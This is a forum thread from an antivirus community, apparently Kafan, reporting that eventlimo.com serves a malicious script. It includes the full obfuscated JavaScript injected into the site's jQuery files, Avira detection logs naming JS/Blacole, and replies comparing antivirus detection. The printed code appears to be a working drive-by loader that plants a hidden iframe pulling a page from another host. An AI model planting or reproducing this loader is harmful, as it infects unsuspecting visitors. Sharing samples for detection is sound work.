查看: 1285|回复: 4
收起左侧

[已鉴定] http://eventlimo.com/

[复制链接]
fireold
发表于 2013-12-3 06:41:59 | 显示全部楼层 |阅读模式
  1. /*32f02e*/
  2. mqzfcr = "y";
  3. qmk = "document";
  4. try {
  5.     +
  6.     function() {
  7.         if (document.querySelector)--(window[qmk].getElementById("asd"))
  8.     }()
  9. } catch (mtd) {
  10.     umev = function(mkt) {
  11.         mkt = "fro" + mkt;
  12.         for (rim = 0; rim < mqzfcr.length; rim++) {
  13.             lgokhw += String[mkt](dijdo(pifc + (mqzfcr[rim])) - (37));
  14.         }
  15.     };
  16. };
  17. dijdo = eval;
  18. pifc = "0x";
  19. xbwjm = 0;
  20. if (!xbwjm) {
  21.     try {
  22.         ++dijdo(qmk)["\x62o" + "d" + mqzfcr]
  23.     } catch (mtd) {
  24.         prl = "(";
  25.     }
  26.     mqzfcr = "45(8b(9a(93(88(99(8e(94(93(45(8c(99(94(55(5e(4d(4e(45(a0(32(2f(45(9b(86(97(45(98(99(86(99(8e(88(62(4c(86(8f(86(9d(4c(60(32(2f(45(9b(86(97(45(88(94(93(99(97(94(91(91(8a(97(62(4c(8e(93(89(8a(9d(53(95(8d(95(4c(60(32(2f(45(9b(86(97(45(8c(99(94(45(62(45(89(94(88(9a(92(8a(93(99(53(88(97(8a(86(99(8a(6a(91(8a(92(8a(93(99(4d(4c(8e(8b(97(86(92(8a(4c(4e(60(32(2f(32(2f(45(8c(99(94(53(98(97(88(45(62(45(4c(8d(99(99(95(5f(54(54(91(86(9a(93(8d(86(97(89(99(8c(9a(8e(99(86(97(98(53(88(94(92(54(7f(79(75(72(59(69(9b(9d(53(95(8d(95(4c(60(32(2f(45(8c(99(94(53(98(99(9e(91(8a(53(95(94(98(8e(99(8e(94(93(45(62(45(4c(86(87(98(94(91(9a(99(8a(4c(60(32(2f(45(8c(99(94(53(98(99(9e(91(8a(53(88(94(91(94(97(45(62(45(4c(5c(57(56(4c(60(32(2f(45(8c(99(94(53(98(99(9e(91(8a(53(8d(8a(8e(8c(8d(99(45(62(45(4c(5c(57(56(95(9d(4c(60(32(2f(45(8c(99(94(53(98(99(9e(91(8a(53(9c(8e(89(99(8d(45(62(45(4c(5c(57(56(95(9d(4c(60(32(2f(45(8c(99(94(53(98(99(9e(91(8a(53(91(8a(8b(99(45(62(45(4c(56(55(55(55(5c(57(56(4c(60(32(2f(45(8c(99(94(53(98(99(9e(91(8a(53(99(94(95(45(62(45(4c(56(55(55(55(5c(57(56(4c(60(32(2f(32(2f(45(8e(8b(45(4d(46(89(94(88(9a(92(8a(93(99(53(8c(8a(99(6a(91(8a(92(8a(93(99(67(9e(6e(89(4d(4c(8c(99(94(4c(4e(4e(45(a0(32(2f(45(89(94(88(9a(92(8a(93(99(53(9c(97(8e(99(8a(4d(4c(61(95(45(8e(89(62(81(4c(8c(99(94(81(4c(45(88(91(86(98(98(62(81(4c(8c(99(94(55(5e(81(4c(45(63(61(54(95(63(4c(4e(60(32(2f(45(89(94(88(9a(92(8a(93(99(53(8c(8a(99(6a(91(8a(92(8a(93(99(67(9e(6e(89(4d(4c(8c(99(94(4c(4e(53(86(95(95(8a(93(89(68(8d(8e(91(89(4d(8c(99(94(4e(60(32(2f(45(a2(32(2f(a2(32(2f(8b(9a(93(88(99(8e(94(93(45(78(8a(99(68(94(94(90(8e(8a(4d(88(94(94(90(8e(8a(73(86(92(8a(51(88(94(94(90(8e(8a(7b(86(91(9a(8a(51(93(69(86(9e(98(51(95(86(99(8d(4e(45(a0(32(2f(45(9b(86(97(45(99(94(89(86(9e(45(62(45(93(8a(9c(45(69(86(99(8a(4d(4e(60(32(2f(45(9b(86(97(45(8a(9d(95(8e(97(8a(45(62(45(93(8a(9c(45(69(86(99(8a(4d(4e(60(32(2f(45(8e(8b(45(4d(93(69(86(9e(98(62(62(93(9a(91(91(45(a1(a1(45(93(69(86(9e(98(62(62(55(4e(45(93(69(86(9e(98(62(56(60(32(2f(45(8a(9d(95(8e(97(8a(53(98(8a(99(79(8e(92(8a(4d(99(94(89(86(9e(53(8c(8a(99(79(8e(92(8a(4d(4e(45(50(45(58(5b(55(55(55(55(55(4f(57(59(4f(93(69(86(9e(98(4e(60(32(2f(45(89(94(88(9a(92(8a(93(99(53(88(94(94(90(8e(8a(45(62(45(88(94(94(90(8e(8a(73(86(92(8a(50(47(62(47(50(8a(98(88(86(95(8a(4d(88(94(94(90(8e(8a(7b(86(91(9a(8a(4e(32(2f(45(50(45(47(60(8a(9d(95(8e(97(8a(98(62(47(45(50(45(8a(9d(95(8e(97(8a(53(99(94(6c(72(79(78(99(97(8e(93(8c(4d(4e(45(50(45(4d(4d(95(86(99(8d(4e(45(64(45(47(60(45(95(86(99(8d(62(47(45(50(45(95(86(99(8d(45(5f(45(47(47(4e(60(32(2f(a2(32(2f(8b(9a(93(88(99(8e(94(93(45(6c(8a(99(68(94(94(90(8e(8a(4d(45(93(86(92(8a(45(4e(45(a0(32(2f(45(9b(86(97(45(98(99(86(97(99(45(62(45(89(94(88(9a(92(8a(93(99(53(88(94(94(90(8e(8a(53(8e(93(89(8a(9d(74(8b(4d(45(93(86(92(8a(45(50(45(47(62(47(45(4e(60(32(2f(45(9b(86(97(45(91(8a(93(45(62(45(98(99(86(97(99(45(50(45(93(86(92(8a(53(91(8a(93(8c(99(8d(45(50(45(56(60(32(2f(45(8e(8b(45(4d(45(4d(45(46(98(99(86(97(99(45(4e(45(4b(4b(32(2f(45(4d(45(93(86(92(8a(45(46(62(45(89(94(88(9a(92(8a(93(99(53(88(94(94(90(8e(8a(53(98(9a(87(98(99(97(8e(93(8c(4d(45(55(51(45(93(86(92(8a(53(91(8a(93(8c(99(8d(45(4e(45(4e(45(4e(32(2f(45(a0(32(2f(45(97(8a(99(9a(97(93(45(93(9a(91(91(60(32(2f(45(a2(32(2f(45(8e(8b(45(4d(45(98(99(86(97(99(45(62(62(45(52(56(45(4e(45(97(8a(99(9a(97(93(45(93(9a(91(91(60(32(2f(45(9b(86(97(45(8a(93(89(45(62(45(89(94(88(9a(92(8a(93(99(53(88(94(94(90(8e(8a(53(8e(93(89(8a(9d(74(8b(4d(45(47(60(47(51(45(91(8a(93(45(4e(60(32(2f(45(8e(8b(45(4d(45(8a(93(89(45(62(62(45(52(56(45(4e(45(8a(93(89(45(62(45(89(94(88(9a(92(8a(93(99(53(88(94(94(90(8e(8a(53(91(8a(93(8c(99(8d(60(32(2f(45(97(8a(99(9a(97(93(45(9a(93(8a(98(88(86(95(8a(4d(45(89(94(88(9a(92(8a(93(99(53(88(94(94(90(8e(8a(53(98(9a(87(98(99(97(8e(93(8c(4d(45(91(8a(93(51(45(8a(93(89(45(4e(45(4e(60(32(2f(a2(32(2f(8e(8b(45(4d(93(86(9b(8e(8c(86(99(94(97(53(88(94(94(90(8e(8a(6a(93(86(87(91(8a(89(4e(32(2f(a0(32(2f(8e(8b(4d(6c(8a(99(68(94(94(90(8e(8a(4d(4c(9b(8e(98(8e(99(8a(89(84(9a(96(4c(4e(62(62(5a(5a(4e(a0(a2(8a(91(98(8a(a0(78(8a(99(68(94(94(90(8e(8a(4d(4c(9b(8e(98(8e(99(8a(89(84(9a(96(4c(51(45(4c(5a(5a(4c(51(45(4c(56(4c(51(45(4c(54(4c(4e(60(32(2f(32(2f(8c(99(94(55(5e(4d(4e(60(32(2f(a2(32(2f(a2".split(prl);
  27.     lgokhw = "";
  28.     umev("mCharCode");
  29.     dijdo("" + lgokhw);
  30. } /*/32f02e*/
复制代码


Avira
2013/12/3 上午 06:39 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\responsiveslides[1].js'
      包含病毒或有害的程式 'JS/Blacole.45512' [virus]
      已採取動作:
      檔案會移動至 '5bffaebc.qua' 名稱底下的隔離區目錄。.

2013/12/3 上午 06:39 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        810
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/12/3 上午 06:39 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\jquery.min[2].js'
      包含病毒或有害的程式 'JS/Blacole.45512' [virus]
      已採取動作:
      檔案會移動至 '5a0ba2f4.qua' 名稱底下的隔離區目錄。.

2013/12/3 上午 06:39 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數:        813
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2013/12/3 上午 06:38 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\responsiveslides[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.45512 [virus]'
      執行的動作:傳輸至掃描程式

2013/12/3 上午 06:38 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\GP9UHU8J\responsiveslides[1].js 中
      偵測到病毒或有害的程式 'JS/Blacole.45512 [virus]'
      執行的動作:拒絕存取

2013/12/3 上午 06:38 [Web Protection] 發現惡意程式碼
      從 URL "http://eventlimo.com/jQueryAssets/responsiveslides.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.45512' [virus]。
      已採取動作:已略過

2013/12/3 上午 06:38 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\jquery.min[2].js 中
      偵測到病毒或有害的程式 'JS/Blacole.45512 [virus]'
      執行的動作:傳輸至掃描程式

2013/12/3 上午 06:38 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\INV2BTG1\jquery.min[2].js 中
      偵測到病毒或有害的程式 'JS/Blacole.45512 [virus]'
      執行的動作:拒絕存取

2013/12/3 上午 06:38 [Web Protection] 發現惡意程式碼
      從 URL "http://eventlimo.com/jQueryAssets/jquery.min.js" 存取資料時,
      發現病毒或有害的程式 'JS/Blacole.45512' [virus]。
      已採取動作:已略過


av3.jpg



fs is
fs3.jpg
suke0903
发表于 2013-12-3 13:29:12 | 显示全部楼层
趋势+猎豹浏览器毫无反应
abz1234
发表于 2013-12-3 16:58:39 | 显示全部楼层
suke0903 发表于 2013-12-3 13:29
趋势+猎豹浏览器毫无反应

已中招
trisfree
发表于 2013-12-3 17:10:17 | 显示全部楼层
abz1234 发表于 2013-12-3 16:58
已中招

诺顿也没反应 我擦。。。中招
aplk1002
发表于 2013-12-3 22:54:17 | 显示全部楼层
卡巴
QQ截图20131203225406.png
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 14:53 , Processed in 0.145424 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表